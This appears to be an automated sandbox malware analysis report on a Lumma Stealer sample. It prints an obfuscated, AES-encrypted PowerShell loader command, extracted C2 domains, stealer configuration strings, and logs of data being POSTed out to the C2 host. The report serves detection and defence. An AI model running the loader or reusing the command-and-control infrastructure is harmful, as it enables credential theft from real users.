317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:11:14.941168+010020283713Unknown Traffic192.168.2.449849188.114.96.3443TCP
              2025-01-01T17:11:15.918952+010020283713Unknown Traffic192.168.2.449855188.114.96.3443TCP
              2025-01-01T17:11:17.055447+010020283713Unknown Traffic192.168.2.449865188.114.96.3443TCP
              2025-01-01T17:11:18.138884+010020283713Unknown Traffic192.168.2.449871188.114.96.3443TCP
              2025-01-01T17:11:19.224758+010020283713Unknown Traffic192.168.2.449881188.114.96.3443TCP
              2025-01-01T17:11:20.475520+010020283713Unknown Traffic192.168.2.449888188.114.96.3443TCP
              2025-01-01T17:11:21.780893+010020283713Unknown Traffic192.168.2.449899188.114.96.3443TCP
              2025-01-01T17:11:24.796765+010020283713Unknown Traffic192.168.2.449918188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:11:15.451455+010020546531A Network Trojan was detected192.168.2.449849188.114.96.3443TCP
              2025-01-01T17:11:16.388302+010020546531A Network Trojan was detected192.168.2.449855188.114.96.3443TCP
              2025-01-01T17:11:25.246850+010020546531A Network Trojan was detected192.168.2.449918188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:11:15.451455+010020498361A Network Trojan was detected192.168.2.449849188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:11:16.388302+010020498121A Network Trojan was detected192.168.2.449855188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:11:17.658072+010020480941Malware Command and Control Activity Detected192.168.2.449865188.114.96.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://noisercluch.click/api=Avira URL Cloud: Label: malware
              Source: https://noisercluch.click/Avira URL Cloud: Label: malware
              Source: https://noisercluch.click/api8)Avira URL Cloud: Label: malware
              Source: https://noisercluch.click/apiAvira URL Cloud: Label: malware
              Source: noisercluch.clickAvira URL Cloud: Label: malware
              Source: 9.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["noisercluch.click", "screwamusresz.buzz", "hummskitnj.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "inherineau.buzz", "appliacnesot.buzz"], "Build id": "WG6I6S--web44"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.7% probability
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisercluch.click
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: WG6I6S--web44
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00415640 CryptUnprotectData,9_2_00415640
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49855 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49871 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49881 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49888 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49899 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49918 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06BE6839h4_2_06BE67D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06BE6839h4_2_06BE67C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06BE6839h4_2_06BE69C9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]9_2_00426230
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edx], cx9_2_004192C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]9_2_0040D35C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_0043C59C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]9_2_0043EEC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h9_2_0043EEC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_0042BF45
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]9_2_0043F040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h9_2_0043F040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl9_2_0042B078
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh9_2_0043A800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h9_2_0043A800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh9_2_0043A800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_0043A800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]9_2_0043B813
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h9_2_0043E8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi9_2_004210F3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax9_2_00418095
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]9_2_0042C894
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_004290B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]9_2_004290B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp edx9_2_0043D140
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_0041D172
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]9_2_0042C9DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]9_2_0042C9E9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]9_2_0042C984
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_0041D189
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]9_2_004259B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edx], cx9_2_00414A50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, ecx9_2_00414A50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, dword ptr [esp+20h]9_2_00414A50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00414A50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00414A50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, edx9_2_0041720B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]9_2_0041720B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then and esi, 80000000h9_2_00408A20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]9_2_00428290
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]9_2_0043DAA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h9_2_0043DBB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]9_2_00407440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]9_2_00407440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h9_2_0041CC60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]9_2_0043B46A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h9_2_0043BC14
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax9_2_0043BC14
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax9_2_00416D52
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, ecx9_2_0041D560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp]9_2_00437D00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], cx9_2_0041AD81
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]9_2_00429DA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx9_2_0040EDB4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax9_2_0040EDB4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, dword ptr [esp+54h]9_2_00428640
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax9_2_0043BCDB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [ecx]9_2_004146C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ecx], al9_2_004266C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp edx9_2_004226D3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh9_2_00437790
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push dword ptr [esp+04h]9_2_00437790

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49855 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49865 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49855 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49849 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49849 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49918 -> 188.114.96.3:443
              Source: Malware configuration extractorURLs: noisercluch.click
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: global trafficHTTP traffic detected: GET /web.png HTTP/1.1Host: cc.klipjaqemiu.shopConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49849 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49855 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49871 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49881 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49888 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49899 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 188.114.96.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QCN9PQE8F9B0U7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18139Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8YGJKPGFYZMNNECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8766Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D2TMTQXTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1P92F68DOIFXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1191Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y28BDORXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568376Host: noisercluch.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: noisercluch.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /web.png HTTP/1.1Host: cc.klipjaqemiu.shopConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: cc.klipjaqemiu.shop
              Source: global trafficDNS traffic detected: DNS query: noisercluch.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: noisercluch.click
              Source: mshta.exe, 00000000.00000003.1725019421.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725177020.0000000006692000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722082534.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725151894.000000000668F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1721997888.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1728590265.0000000006693000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1724065877.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722157514.000000000668A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
              Source: powershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
